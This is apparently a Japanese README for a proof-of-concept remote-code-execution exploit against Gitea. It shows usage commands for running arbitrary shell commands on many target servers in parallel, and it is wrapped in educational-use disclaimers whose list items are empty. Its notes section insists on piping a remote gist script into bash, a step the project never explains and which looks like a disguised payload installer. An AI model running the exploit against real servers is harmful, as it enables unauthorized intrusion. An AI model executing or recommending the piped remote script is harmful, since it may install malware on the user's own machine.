
CVE-2026-60004
詳細: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
PayPalまたは以下のQRコードをスキャンして、このプロジェクトの維持をサポートしてください。
このプロジェクトは、以下のような安全かつ許可された環境でのみ使用してください:
セットアップ例:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
使用例:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
注意:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行する必要があります管理された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。
このリポジトリは教育および許可されたセキュリティ研究のみを目的としています。
このリポジトリは、ユーザーが以下について学ぶのに役立つように設計されています:
このリポジトリは、以下のような許可を得た環境でのみ使用してください:
許可されていない、または違法な使用は固く禁止されています。
著者および貢献者は、このプロジェクトによって引き起こされたいかなる損害、誤用、法的問題、または損失についても責任を負いません。
このリポジトリを使用することにより、あなたは以下に同意したことになります:
このプロジェクトは以下を目的としています:
責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。
責任ある開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。